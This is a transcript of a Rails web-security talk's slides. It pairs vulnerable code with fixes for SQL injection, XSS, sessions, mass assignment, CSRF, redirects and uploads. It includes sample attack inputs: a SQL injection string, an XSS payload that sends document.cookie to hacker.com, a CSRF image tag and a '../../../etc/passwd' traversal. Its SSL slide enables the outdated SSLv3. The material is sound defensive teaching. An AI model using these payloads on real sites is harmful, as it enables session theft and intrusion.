Securing your site

Transcript

1. Securing your site. @bob_p

2. How Secure?

3. SQL injection

4. http://xkcd.com/327/

5. None

6. User.where("email ='#{params[:email]}'").first User.first(:conditions => "email = '#{params[:email]}’") SELECT "users".* FROM

   "users" WHERE (email = '' OR 1='1') LIMIT 1

7. User.find_by_email(params[:email]) User.where("email = ?", params[:email]).first User.first(:conditions => ["email = ?",

   params[:email]])

8. Summary Sanitise all SQL input

9. XSS <script>alert(‘h4x0r3d’);</script>

10. <script>alert(‘h4x0r3d’);</script> <script>document.write(‘<img src="http:// hacker.com/' + document.cookie + '">’);</script> <iframe src=”http://hacker.com/hack”></iframe>

11. cookies(:secure_cookie, :httponly => true, :secure => true) Secure your cookies

12. html_escape(“<script></script>”) Escape output < 3

13. “hello”.html_safe? SafeBuffer > 3

14. raw(“<h1>hello</h1>”) > 3 SafeBuffer

15. Summary Secure your cookies Ensure user submitted input is sanitised

16. Session management

17. Rails.application.config.session_store :cookie_store Rails.application.config.session_store :cache_store Rails.application.config.session_store :active_record_store Session stores

18. config.secret_token = '3783262ab68df94a79ab0 2edca8a1a9c3....' `rake secret`

19. XSS

20. Insecure networks Image from http://codebutler.com/

21. Rails.application.config.force _ssl = true

22. Allow logout

23. Timeout

24. MyApp::Application.config.session_store :cookie_store, :key => ‘_my_key’, :expire_after => 45.minutes class User

    < ActiveRecord::Base devise :authenticatable, :timeoutable, :timeout_in => 45.minutes end

25. reset_session

26. No concurrent logins

27. Account lockout

28. Password complexity

29. Destroy session on logout def logout reset_session end

30. Hash passwords class User def password=(password) self.encrypted_password = ::BCrypt::Engine.hash_secret(password, self.salt)

    end end

31. http://codahale.com/how-to-safely-store-a-password/ Use bcrypt

32. large objects No

33. critical data No

34. Summary SSL Hash data Clear sessions

35. Mass Assignment “public_key” => {“user_id” => 4223}

36. https://github.com/blog/1068-public-key-security-vulnerability-and-mitigation

37. def signup @user = User.create(params[:user]) end params[:user] = {:username =>

    “pwn3d”, :admin => true}

38. class User attr_protected :admin end

39. class User attr_accessible :email end config.active_record.whitelist_attributes = true

40. class User attr_accessible :role, :as => :admin end

41. User.create({:username => ‘Bob’, :role => “admin”}, :as => :admin)

42. def signup @user = User.create(user_params) end def user_params params[:user].slice(:email) end

43. https://github.com/rails/ strong_parameters

44. Summary attr_accessible Slice pattern attr_protected

45. Direct object reference /users/:id/posts/:post_id

46. def create @user = User.find(params[:user_id]) @note = Note.create(:user => @user,

    :text => params[:text]) end

47. def create @user = User.find(session[:user_id]) @note = @user.notes.create(:text => params[:text])

    end

48. def show @note = Note.find(params[:id]) end

49. def show @user = User.find(session[:user_id]) @note = @user.notes.find(params[:id]) end

50. def show @user = User.find(session[:user_id]) @note = Note.find(params[:id]) if @note.editable_by?(@user)

    # Do things end end

51. Summary Find users from session Use scoping methods

52. CSRF <img src=”http://demo.com/notes/1/destroy” />

53. <img src=”http://example.com/notes/1/destroy” />

54. POST PUT DELETE GET Safe requests / queries Changes resource

    / orders

55. <input name="authenticity_token" type="hidden" value="HmY6ZvG0Qq3X7nv1yKm54cv05mpnw" />

56. class ApplicationController protect_from_forgery end

57. Summary Correct http verbs Rails CSRF protection

58. Redirection & file uploads

59. def login login_business redirect_to params[:from] end

60. def login login_business redirect_to session[:from] end

61. Sanitise file names

62. “../../../etc/passwd”

63. https://github.com/thoughtbot/paperclip/blob/master/lib/paperclip/ attachment.rb#L435 def cleanup_filename(filename) filename.gsub(/[&$+,\/:;=?@<>\[\]\ {\}\|\\\^~%# ]/, ‘_’) end

64. Sanitise file type

65. class User validates_attachment :avatar, :presence => true, :content_type => {

    :content_type => "image/jpg" }, :size => { :in => 0..10.kilobytes } end

66. Process asynchronously

67. Summary No redirect locations in params Sanitise file name/type Process

    files a-sync

68. SSL

69. Rails.application.config.force _ssl = true

70. ssl_ciphers HIGH:!aNULL:!MD5; ssl_protocols SSLv3 TLSv1;

71. Summary Use SSL!

72. Admin & intranet

73. CSRF

74. XSS

75. Whistlist.contains? (request.remote_ip)

76. Summary XSS / CSRF / Injection Restrict access

77. Info leakage

78. server_tokens off;

79. None

80. Summary Don’t give away anything

81. Server-side

82. User privileges

83. config.filter_parameters += [:password]

84. Summary Restrict user permissions Obscure sensitive data

85. Resources

86. guides.rubyonrails.org/security.html

87. www.rorsecurity.info

88. brakemanscanner.org

89. github.com/relevance/tarantula

90. www.owasp.org

91. @bob_p http://mintdigital.com ColorPalette: http://www.colourlovers.com/lover/electrikmonk/loveNote Thanks!